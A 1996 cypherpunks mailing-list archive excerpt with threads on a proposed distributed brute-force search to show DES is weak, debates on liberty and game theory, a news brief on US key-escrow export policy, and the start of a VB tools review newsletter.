flat rate local phone connection so could run a cracking session permanently
(as long as no one tells my ISP).  We need a full test of the Winsock
cracking client in any case.  It wasn't working very well last time.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 13:01:51 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <v02120d12ae197fe1f4c9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:50 7/23/96, Paul Foley wrote:
>"Peter Trei" <trei@process.com> wrote:
>
>   Any one up for a distributed brute force attack on single DES? My
>   back-of-the-envelope calculations and guesstimates put this on the
>   hairy edge of doability (the critical factor is how many machines can
>   be recruited - a non-trivial cash prize would help).
>
>Not quite sure what you mean by "doability" -- it's obviously doable,
>it just depends how long you want to wait.
>
>I'm in.

Same here. I think it is about time for another full scale hack. Breaking
DES would help get our message more than breaking 40bit RC-4 ever did.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Jul 1996 14:53:45 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <2.2.32.19960722211219.00d9ede0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 PM 7/22/96 -0400, Perry E. Metzger wrote:
>
>Perhaps a Java page containing a DES cracker that one could run for
>the casual participant, and a set of links to download a real cracker
>for the non-casual participant...

And if it can be cracked using Java anytime in our lifetime, then it is
truely insecure... ]:>

>I think its really time that we did this. DES must be shown to be
>dead.

Personally I would like to see the cracking app written in assembly or
optimized C.  Something that will reduce the search time even farther.
(Everyone talks about the hardware, but inefficient software will cost just
as much time as slow hardware.  Not to mention flaky hardware, as is seen
sometimes with gold lead simms and tin lead sockets. [Personal gripe.  I
have been tracking down system problems for a couple of months involving
just this issue. Damn agrivating!])

>When the media hear about it, they will, of course, get "experts"
>saying "but it took five thousand people millions of dollars in
>computer time". We should ask Matt Blaze to write a paper in advance
>explaining that although this test, on general hardware, took a lot of
>effort, that with specialized hardware it would be cheap as can be.

No matter WHAT is done, they will get some "expert" claming that there is
some flaw in the methodology.  Given enogh attention, those people will look
like hired spin doctors and be pretty much ignored and/or laughed at.

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 06:24:47 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221613.AA00685@Etna.ai.mit.edu>
Message-ID: <199607221822.OAA12499@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> > On 19 Jul 1996 19:51:39 Hallam-Baker wrote
> 
> >>It is no coincidence that the Tree of Liberty needs to be watered with
> >>blood on occasion.
> 
> Nope, that wasn't me who said that. I don't normally quote the words of 
> slave owners on the subject of liberty.

No one would ever accuse you of supporting freedom, Phill. I'm sure it
was an accident.

(BTW, Jefferson's slaves were inherited and an an entailment clause in
the will prevented him from freeing them during his lifetime. Not, of
course, that this matters -- the idea of confusing the messenger and
the message is the ad hominem fallacy.)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 10:57:04 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
In-Reply-To: <199607221650.EAA01429@mycroft.actrix.gen.nz>
Message-ID: <199607221830.OAA12526@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Perhaps a Java page containing a DES cracker that one could run for
the casual participant, and a set of links to download a real cracker
for the non-casual participant...

I think its really time that we did this. DES must be shown to be
dead.

When the media hear about it, they will, of course, get "experts"
saying "but it took five thousand people millions of dollars in
computer time". We should ask Matt Blaze to write a paper in advance
explaining that although this test, on general hardware, took a lot of
effort, that with specialized hardware it would be cheap as can be.

Perry

Paul Foley writes:
> "Peter Trei" <trei@process.com> wrote:
> 
>    Any one up for a distributed brute force attack on single DES? My 
>    back-of-the-envelope calculations and guesstimates put this on the
>    hairy edge of doability (the critical factor is how many machines can
>    be recruited - a non-trivial cash prize would help). 
> 
> Not quite sure what you mean by "doability" -- it's obviously doable,
> it just depends how long you want to wait.
> 
> I'm in.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 23 Jul 1996 11:35:35 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
In-Reply-To: <199607221614.MAA12400@jekyll.piermont.com>
Message-ID: <TDDHRD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> 
> Anonymous writes:
> > FBI Special Agent Safdar is upset enough by the revelation
> > of his true identity to issue a quick denial (on a sunday night, to get
> > more OT no doubt), but he doesn't even bother to try to refute the 
> > central truth that his cover has been blown by a careless operator at
> > his home office who verified his employment and offered to take a message
> > for him.
> 
> You really are on drugs. The question is, which ones?

Ritalin?

I boycott "Dr." David Sternlight.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 11:15:13 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607221822.OAA12499@jekyll.piermont.com>
Message-ID: <9607221842.AA00771@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>No one would ever accuse you of supporting freedom, Phill. I'm sure it
>was an accident.

Actually I have been very active in circles like Liberty (the UK version
of the ACLU). Its just that we have entirely different ideas of what liberty 
is. Perry believes that libery is license and I believe in the utilitarian
formulation of Liberty as advanced by Mill, Russell et al.

>(BTW, Jefferson's slaves were inherited and an an entailment clause in
>the will prevented him from freeing them during his lifetime. Not, of
>course, that this matters -- the idea of confusing the messenger and
>the message is the ad hominem fallacy.)

Nope, ad-hominen is a perfectly acceptable form of attack when calling
into question a speaker's credentials. The words are used because they
were Jefferson's and because he is held up as a supporter of liberty.
Pointing out that the words are the cant of a hypocrite is entirely
justified.

Notwithstanding entailment clauses, Jefferson was under no compunction to
exploit his slaves by exploiting their labour. He could have paid them 
competative wages and allowed them to chose to work for others. In short
he could in effect have freed them. Of course then he would not have had 
the financial means to live as a member of the privileged classes. 

Genuine philosophers have made such sacrifices. Russell gave away his 
inheritance after completing Principia because he objected to the idea
of inherited wealth. 


Of course if Perry was interested in genuine liberty instead of a slave
owner's idea of liberty - liberty to exploit others he would see the 
contradiciton in his rhetoric.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Tue, 23 Jul 1996 12:48:30 +0800
To: perry@piermont.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607222152.OAA28102@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:

>hallam@Etna.ai.mit.edu writes:
>> > On 19 Jul 1996 19:51:39 Hallam-Baker wrote
>> 
>> >>It is no coincidence that the Tree of Liberty needs to be watered with
>> >>blood on occasion.
>> 
>> Nope, that wasn't me who said that. I don't normally quote the words of 
>> slave owners on the subject of liberty.
>
>No one would ever accuse you of supporting freedom, Phill. I'm sure it
>was an accident.


Perry,

Can we add "Doc" Hallam-Baker to the pledge program?

Seriously, c-punks is an incredibly valuable resource/forum. There are many
hundreds of folks on the list (like me) who may not have the relevant
technical expertise to contribute intelligently and/or frequently, but I
think that we all _learn_ a great deal by reading the timely and thoughtful
essays, debates, and points of view selflessly and sometimes thanklessly
contributed by the likes of (in no particular order and by no means
inclusively) Messrs. May, Sandfort, Unicorn, Green, Parekh, your goodself
and many, many, many others.

Of course, there are always those who will willfully waste thousands of
man-hours per day for the list with their obviously unwelcome drivel (I do
not here make reference to the clueless "suscrives" who stumble onto the
list with questions about "kewl stuff").

In a physical setting, even the most obtuse person eventually realizes that
he or she is being ostracized, but in the ether...

(Sigh...)

David M. Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 23 Jul 1996 10:02:55 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <199607221831.LAA28568@server1.chromatic.com>
Message-ID: <Pine.SOL.3.91.960722145721.14181A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 22 Jul 1996, Ernest Hua wrote:

> 
> > > > Thanks, but if it is all the same to you, I'd rather live
> > > > in a country where everybody  << including six year olds >>
> > > > carry, and can use Uzi's, etc, as a matter of course.
> > > 
> > > Would you just hand out guns to all teenagers?
> > 
> > My twelve-year-old daughter asked for and received a .22 for her birthday.
> > Her four and six year old siblings enjoy shooting it, under close 
> > supervision.
> 
> The question was not whether you might let your little girl operate
> a gun.  The question was whether you might let her carry it as part
> of her standard equipment.  Would you let her go to school with it
> loaded or with ammo within easy reach?  I mean, what's the point of
> carrying a gun without bullets?

My daughter often carries her gun to school, complete with large 
quantities of high-velocity long-rifle cartridges.

She's homeschooled and marksmanship is one of her extracurricular activities.

bd

p.s.  In two years of homeschooling, she has advanced 6 grade levels on 
the state-mandated achievement tests.  

> 
> Ern
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 10:06:35 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221842.AA00771@Etna.ai.mit.edu>
Message-ID: <199607221905.PAA12591@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> >No one would ever accuse you of supporting freedom, Phill. I'm sure it
> >was an accident.
> 
> Actually I have been very active in circles like Liberty (the UK version
> of the ACLU). Its just that we have entirely different ideas of what liberty 
> is. Perry believes that libery is license and I believe in the utilitarian
> formulation of Liberty as advanced by Mill, Russell et al.

You don't believe in Mill's formulation, Phill. If you did, you
couldn't possibly support 90% of the garbage you talk about. Mill was
a libertarian in the modern sense -- he opposed virtually everything
government did. Yes, his opposition was utilitarian, but so what? You
use utilitarianism to justify the indefensible.

You say I think that my idea of freedom is license. Perhaps. However,
I think my notion is closer to the common conception than yours, which
owes more to Orwellian redefinition than to the normal use of the
term.

> Of course if Perry was interested in genuine liberty instead of a slave
> owner's idea of liberty

Again, that is ad hominem. You say that ad hominem's are fine when one
is questioning a speaker's credentials, but the point is that
Jefferson's credentials are immaterial. You call him a slave owner as
in order to try to taint his ideas. However, ideas cannot be
tainted. If Adolf Hitler felt that high speed autobahns were a good
idea, that doesn't make highways a bad idea simply because of the
person who conceived of them.

Jefferson could have been a mass murderer for all I care. His words
may be evaluated fully independently of his actions. They are not
interdependent.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 23 Jul 1996 10:47:35 +0800
To: "Perry E. Metzger" <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <4srn51$pl8@life.ai.mit.edu>
Message-ID: <31F3D20C.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> > There are surely alternatives to the extremes of unilateral
> > disarmament and an arms race? For instance, slowing down  the
> > race?
> 
> Don't ask the question as though it is theoretical. Don't try
> answering it as though your personal values have any bearing, because
> there is indeed an objective answer here. Try doing some game theory
> simulations and see how well unilateral disarmament works.

Perry, just out of curiosity which type of game theory system are
you refering to, the standard, single shot game thoery or the 
communicative model of Alker, Hurwitz and Rothkin?

As a computer scientist I would have thought you would have been 
up on the idea of adding memory to game theory interactions. In such
cases the optimal outcome can turn out very differently than in the
standard model. 

Claiming certainty from theoretical results is in general not a
good idea. Unless you can explain the relevance of the theory to a 
situation and explain why the assumptions in the model are justified 
you are not saying very much.

The fact that the US and the USSR did manage to negotiate disarmament
despite the standard game theory predictions shows that the system
is somewhat more complex than Perry's ideological view.

Briefly stated in Alker-Hurwitz a "memory" component was added into
the model. The prisoner's dilema was repeated on many occasisons in
a variety of contexts, including computer simulation and in practice.
In practice the prisoner's chose the joint optimal solution the 
majority of the time. 


>Oh, and don't give us stuff about how humans are above evolutionary
>pressures or nonsense like that, because we aren't any more above such
>pressures than we are above the laws of physics.

The "laws" of social scienst are not the "laws of physics". The "laws
of physics" aren't so constant either. Theoretical results should 
inform the intellect not serve as a substitute for it.

If you apply genetic programming techniques to the system the strategy
that evolves is typically a cooperative one. The facts is that the
theory applied in an evolutionary context disproves Perry.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 10:07:30 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <31F3D20C.167E@ai.mit.edu>
Message-ID: <199607221917.PAA12611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hallam-Baker writes:
> As a computer scientist I would have thought you would have been 
> up on the idea of adding memory to game theory interactions. In such
> cases the optimal outcome can turn out very differently than in the
> standard model. 

Memory is the only way that things like iterated prisoner's dilemmas
become interesting.

> The fact that the US and the USSR did manage to negotiate disarmament
> despite the standard game theory predictions shows that the system
> is somewhat more complex than Perry's ideological view.

I'm afraid, Phill, that you didn't read what I said. Unilateral
disarmament is stupid. Multilateral is not necessarily stupid.

> >Oh, and don't give us stuff about how humans are above evolutionary
> >pressures or nonsense like that, because we aren't any more above such
> >pressures than we are above the laws of physics.
> 
> The "laws" of social scienst are not the "laws of physics".

Try creating a breed of Humans that don't want to have children and
see how many generations you can get them to live for.

Try creating a breed of Humans that like walking in front of cars and
see how long they last.

There is a reason humans do things like agressively defending their
children with their lives if need be. There is a reason humans resort
to violence when their place in the gene pool is threatened.

Some of this stuff is plumb obvious to anyone with half a brain,
Phill.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pj ponder <ponder@mail.irm.state.fl.us>
Date: Tue, 23 Jul 1996 11:14:41 +0800
To: cypherpunks@toad.com
Subject: 9107 U.S. Government Unveils New Encryption Policy Recommendations 07.19.96 (fwd)
Message-ID: <Pine.3.89.9607221540.A19661-0100000@mail.irm.state.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


The High Performance Computing newsletter (HPCWire) just ran this article.

Looks like Government Access to Export Keys (GAEK) or
         Government Access to Keys - Export (GAKE) or
just plain GAK, for simplicity's sake.

ObNetscape- I can run a web browser, like Netscape, over T1 link through 
firewall, but Netscape can't reverse DNS the address, so I can't get the 
more secure version; I can run Lynx from my account at the university, but
Netscape doesn't like lynx, so I am back to dial-up PPP, at 14.4 .... 
Frustrating... any news on funet, or other 'export' sites?
--
pj
---------- Forwarded message ---------- 
Date: Mon, 22 Jul 96 11:29:34 -0700
From: HPCwire <hpcwire@newsmaster.tgc.com>
To: ponder@mail.irm.state.fl.us
Subject: 9107 U.S. Government Unveils New Encryption Policy Recommendations 
07.19.96

U.S. Government Unveils New Encryption Policy Recommendations        07.19.96
NEWS BRIEFS                                                           HPCwire
=============================================================================

  Washington, DC -- U.S. Vice President Al Gore recently unveiled new
recommendations to relax encryption export restrictions. The recommendations
come with the caveat that restrictions will be eased only if the "keys" are
escrowed to permit U.S. government access.

  Under the proposed key escrow, government officials could gain access to
software keys with a court order, undergoing a process similar to that
required to obtain wire taps.

  "These recommendations will protect individuals' transactions and
communications on the Internet nationally and internationally while
maintaining U.S. security," Gore said.

  Under the plan discussed by Gore, no restrictions of any kind would be
imposed on encryption software for use within the United States. But software
programs could only be exported with key escrow features allowing the U.S.
government access to the keys. Private companies would be established to hold
software keys and government could gain access with a court order.

  The administration abandoned earlier proposals that would have required
the government hold copies of all keys. The new proposal would also give the
Commerce Department authority currently held by the State Department over
encryption export decisions.

  Software industry analysts estimate that current export restrictions will
cost U.S. companies up to $60 billion in lost sales over the next few years.
According to press reports from Reuters, Netscape has noted that it is
already losing tens of millions of dollars in overseas sales because of
encryption export limits. The limits also impact to some degree the growth of
Internet commerce.

   Whitehouse officials are reluctant to recognize the claims of the software
industry. "There are a lot of myths about the nature of the imminent
commercial threat," Gore said, adding that officials at some companies,
such as International Business Machines, are supportive of the
administration's approach.

  According to press reports, another White House official said other
countries would ban the import of U.S. software if controls on encryption
were eased. "They will put up import barriers," the official said, adding the
United States is trying to craft an international consensus on encryption
policy, including use of key escrow, under the auspices of the Organization
for Economic Cooperation and Development. The talks are "very far down the
tracks," the White House official said.

  An administration cabinet committee is continuing to address details of the
proposal, and expects to send its recommendations to President Clinton by
early September. Administration officials continue to hold talks with
industry executives, civil liberties groups and others. 

********************************************************************************
HPCwire has released all copyright restrictions for this item. Please feel
free to distribute this article to your friends and colleagues. For a free
trial subscription, send e-mail to trial@hpcwire.tgc.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Tue, 23 Jul 1996 09:26:52 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR's 40 bit limit
In-Reply-To: <199607202345.TAA01019@darius.cris.com>
Message-ID: <199607222235.PAA09111@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: "David F. Ogren" <ogren@cris.com>
> Date: Sat, 20 Jul 1996 19:45:29 -0400 (EDT)
> 
> Another paradox of the US export regulations.
> 
> The NSA is allowing 40 bit crypto exports.  So as a hypothetical example 
> assume that I write a crypto program that uses 40 bit RC4 to encode data 
> (licensing from RSA).  I then get an export license using the accelerated 
> process for 40 bit RC4.

Sorry, RC4 only works in OFB mode.  It is not a block cypher.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 14:36:26 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607221917.PAA12611@jekyll.piermont.com>
Message-ID: <9607221944.AA00931@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Memory is the only way that things like iterated prisoner's dilemmas
>become interesting.

Having spent the weekend with Alker I'm hardly going to argue.

>There is a reason humans do things like agressively defending their
>children with their lives if need be. There is a reason humans resort
>to violence when their place in the gene pool is threatened.

That is one effect, but not the only effect. Depending upon what 
the conditions you set up arround the problem you can change
the outcome. What are the risks of fighting for example? Evolution
does not uniformly favour hawks, in terms of numbers the doves 
win.


>Some of this stuff is plumb obvious to anyone with half a brain,
>Phill.

Ah yes, and since iterated prisoner's dilema games are as
computationaly complex as the Mandelbrot set (the generator of the
Mandelbrot is in fact simpler), presumably you can calculate the
Mandelbrot set in half your brain Perry?

If it was "plumb obvious" it wouldn't take MIT profs to work
it out Perry. The world is far more complex than your simplistic
notions make out. Just because you can identify ONE effect does
not mean that you have identified ALL effects or even that you
have identified the dominant one. 


Your analyses are almost always junk because you only analyse one
side of the argument and deny that there is another side. You are
great at preaching to the choir Perry, problem is that you don't
convert anyone who isn't already converted.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Tue, 23 Jul 1996 11:34:40 +0800
To: cypherpunks@toad.com
Subject: Re: Bare fibers
Message-ID: <TCPSMTP.16.7.22.-16.21.10.2780269260.1201367@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 * Carbons sent to: In: jimbell@pacifier.com

 -=> Quoting In:jimbell@pacifier.com to Harka <=-

 In> The fiber is usually  coated with a very thin layer of clear plastic to
 In> protect against moisture  and abrasion, and the diameter  is around 0.5
 In> to 1.0 millimeters in diameter.   


Doesn't that make it vulnerable (detectable) to Tempest attacks?

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Tue, 23 Jul 1996 12:02:35 +0800
To: cypherpunks@toad.com
Subject: Re: pledge status
Message-ID: <TCPSMTP.16.7.22.-16.22.26.2780269260.1201375@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 * Carbons sent to: In: alanh@infi.net

 -=> Quoting In:alanh@infi.net to Harka <=-

 In> black-ninjas-pretending-that-they're-in-a-Hollywood-script thread


After all these figure of speech comparisons of federal agents with 'ninja's' I think it's noteworthy, that the ninja's of old were a counterculture themselves.
In fact, they were despised by the ruling class (government) of the samurai as low-lifes and scum of the earth, because the ninjas families would not subdue themselves to 'codes of honor' like the samurai and also practiced different religions (Buddhism) 
The samurai in turn tried to eliminate the ninja's by outlawing the use of weapons, repressing religious freedom and even invading the ninja's 'heartland' of the province of IGA.
Nevertheless, the subsequent elimination of rights for ninja's led to the opposite effect, the ruling samurai had hoped for: instead of being turned into defenseless kids, the ninja's were now free from any boundaries in terms of existing norms and were
thus much more innovative and efficient than the samurai and their 'code of honor'. That enabled the ninja's eventually to survive all onslaughts and dangers to their culture until today.
OBCrypto: They also used various cryptographic methods and systems to transport messages.

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <paul@mycroft.actrix.gen.nz>
Date: Mon, 22 Jul 1996 18:14:37 +0800
To: richieb@teleport.com
Subject: Re: Length of passphrase beneficial?
In-Reply-To: <Pine.SUN.3.92.960721111918.11352A-100000@julie.teleport.com>
Message-ID: <199607220428.QAA11049@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs <richieb@teleport.com> wrote:

   > Actual Question:
   > Does the length and randomness of a passphrase contribute at all
   > to the overall security of a cryptosystem?

   Actual short answer: yes :)

Answer in his particular case, however: no

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
A bird in the bush usually has a friend in there with him.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 23 Jul 1996 16:29:27 +0800
To: cypherpunks@toad.com
Subject: Global Net-Censorship Dispatches at EFF
Message-ID: <Pine.SUN.3.91.960722162843.14742C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 22 Jul 1996 16:28:32 -0700 (PDT)
From: Declan McCullagh <declan@eff.org>
To: fight-censorship+@andrew.cmu.edu
Subject: Global Net-Censorship Dispatches at EFF

Since the f-c archives are still moribund, I've put the last five weeks of
global net-censorship threads from fight-censorship at: 

   http://www.eff.org/pub/Global/Dispatches/

Also check out the Singapore mess at:

   http://www.eff.org/pub/Global/Singapore/

(If those URLs don't work, try www2.eff.org.)

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-visualprog@scribe.cerf.net
Date: Wed, 24 Jul 1996 03:05:24 +0800
To: visualprog@scribe.cerf.net
Subject: No Subject
Message-ID: <199607222332.QAA16327@smtp2.cerf.net>
MIME-Version: 1.0
Content-Type: text/plain



VISUAL PROGRAMMING++

The biweekly newsletter featuring reviews for Windows development products and
Internet/Intranet tools.
VP++ is free to Visual Basic Programmer's Journal subscribers and premier club
members of FTP's Development Exchange web site: http://www.windx.com.

Vol. 1 No. 1
July 12, 1996

Welcome to the premiere issue of Visual Programming++, an e-mail newsletter
providing timely reviews of Windows components, utilities, add-on products and
Internet/Intranet development tools. 
	This premiere issue is being sent to every registered member of The
Development Exchange Web site (DevX). All future issues will be sent as a
service only to paid subscribers of either Visual Basic Programmer's Journal or
DevX's new Premier Club. To subscribe or unsubscribe, follow the instructions at
the end of this document. Every issue will be posted under "Reviews" on DevX.
	VP++ is a part of the totally re-designed DevX Web site. Explore DevX and
you'll see complete archives of articles and code from Visual Basic Programmer's
Journal and Microsoft Interactive Development, plus a database of more than
5,000 Windows development tools updated daily. You'll also see an event calendar
that covers all major trade shows for developers, including details on our
VBITS:Interactive, coming to San Francisco in October. 
	The VP++ charter includes reviewing products for VB, VB Script,
Access/Jet, VC++, Delphi, PowerBuilder, the Microsoft Internet Explorer,
Netscape's Navigator and other tools. Every two weeks subscribers receive
detailed reviews automatically delivered by e-mail.
	Utilities form a theme for this issue. All products are shipping--no beta
software was reviewed. We'll maintain a product review archive on our web site
as we add new editions of VP++. You can search for product information using key
words. For Premiere Club members, we have a bulletin board in the Reviews
section of the Developer's Exchange. You can discuss these reviews or products
there.
	Not only are venders offering demos on web sites, but some reviewers have
posted sample code on web sites as well. I hope you find these reviews useful.
Send questions or comments to editor Frank_Moncrief@MSN.com or
70443.1434@CompuServe.com.

8 PRODUCTS REVIEWED

CONTENTS 
* VBNet 2.01: Automatically converts VB code and forms to VB Script. 
* CodeBank: VB routines you can plug into your own code or share across teams. 
* PowerDoc: Automated documentation generator. 
* IDSMail: OLE server for building email into applications. 
* Total Access Agent: Repair, backup and compacting utility for Access and
VB/Jet databases. 
* DynamiCube 1.31: 32-bit data-bound ActiveX custom control for On-Line
Analytical Processing.
* VB Compress Pro 4.03: Automatically deletes unused or un-referenced code.
* Visual SQL 4.0: Code generator and class library that turns Microsoft Visual
C++ into a client/server development environment.
*Subscribe/Unsubscribe 

------------------------------------------------------------------------

VBNet 2.01 

TVObjects Corporation 
Tel: 609 514-1444 
Fax: 609 514-1004 
http://www.tvobjects.com 
Price: $197 
Runtime: not applicable 
Quick Facts: VBNet 2.01 is a VB4 add-in that uses a wizard to convert VB4 forms
into HTML pages with embedded VB Script code. 

By John Clark Craig 
VBNet is a Visual Basic 4.0 add-in that turns VB4 into an environment for
developing HTML pages with embedded VB Script code. The add-in provides a wizard
that walks you through the automatic steps of converting each of the Visual
Basic forms in your VB 4.0 project into a set of equivalent HTML pages
containing embedded VB Script code that is executed directly by Microsoft's
Internet Explorer 3.0. You can even convert ODBC-compliant client/server
database applications this way. VB Script code is developed right in HTML
pages-there isn't any Integrated Development Environment (IDE) for VBS. Hence,
you can create your app using VB's rich IDE during development (where you can
use the debugger, for example), then you just do the conversion to VB Script
using VBNet. 
	You can do this tedious conversion chore by hand, but believe me, VBNet
simplifies this task quite a bit. While reviewing VBNet, I created a few simple
VB 4.0 applications using the new, restricted VB Script syntax and let VBNet do
its thing to them. I learned a lot about the way VB Script works by studying the
resulting HTML pages created by VBNet, and I realized that even though VB Script
follows a simplified Visual Basic 4.0 syntax, the details of reworking
applications into embedded VB Script code for web pages is more complicated and
exacting than I expected. VBNet handles these details with ease. 
	Here's how it works. You start by developing a working Visual Basic 4.0
application that runs successfully in the Visual Basic development environment,
purposely using the restricted syntax of VB Script. As just one example of this
new syntax, the only variable type allowed in VB Script is the Variant, so
you'll need to edit out the dollar signs from the end of string variable names,
and you'll need to be more explicit in the use of type conversion functions. To
convert existing VB programs, you need to edit variables to conform to VB Script
conventions. (Some helpful documents that cover all the new VB Script syntax
exist on Microsoft's web pages-http://www.microsoft.com/VBScript is the main VB
Script page. There are links to complete documentation, an online tutorial, FAQ
documents, sample VB Script pages, and more).

MAKING THE CONVERSION 
When you're ready to convert your application to HTML pages, you start the VBNet
wizard from VB's Add-In menu. VBNet automatically creates a folder hierarchy
based on your application's name, and populates these folders with the all the
files required for rebuilding the application in the user's browser. VBNet
converts standard buttons, check boxes, text boxes, and many other controls. To
test VBNet for converting third-party controls, I added a Sheridan Software
Tabbed Dialog and it worked. Any controls should be registered on the user's
system. Microsoft provides a set of free downloadable ActiveX controls that are
designed specifically for use with VB Script within IE3. These controls
duplicate the command button, text box, check box, and a few other standard VB4
controls. The set also includes IE Stock Ticker, IE Chart, IE Animated Button
and others. 
	As the conversion proceeds, VBNet generates a report you can view or
print. This report describes any parts of your Visual Basic application that
fail to translate to VB Script, and provides other useful information about the
conversion process. 
	I created an example VB Script application using VBNet that you can
browse at http://home.sprynet.com/sprynet/jccraig using IE3. Be sure to
right-click and select View Source so you can study the actual lines of code
that VBNet created as it converted this simple random-password-generation
application from VB 4.0 to VB Script. Also, TVObjects offers example VB Script
enhanced pages, product information and the latest downloadable updates at its
home pages: http://www.tvobjects.com. 
	You can build powerful ODBC-compliant client/server database applications
for use over the Internet using VBNet and the RemoteData control, available in
the Enterprise edition of VB 4.0. Hence, users can interact with data on your
company's Intranet, for example. You simply add controls to your form that can
be bound to your RemoteData control, get them working in the Visual Basic 4.0
environment, and convert it all using VBNet to enable deployment over the net.
Also, VBNet can generate JavaScript code for database compliant access with
Netscape 2.0. For security reasons, VB Script doesn't allow normal file I/O, but
the remote data capability more than makes up for this limitation. 
	VBNet is a great product. I just wish VBNet had a little tighter
integration with the Visual Basic 4.0 development environment. The syntax
checking for proper VB Script syntax works great, but only during the wizard's
conversion processing. What I'd like to see is immediate feedback as I enter
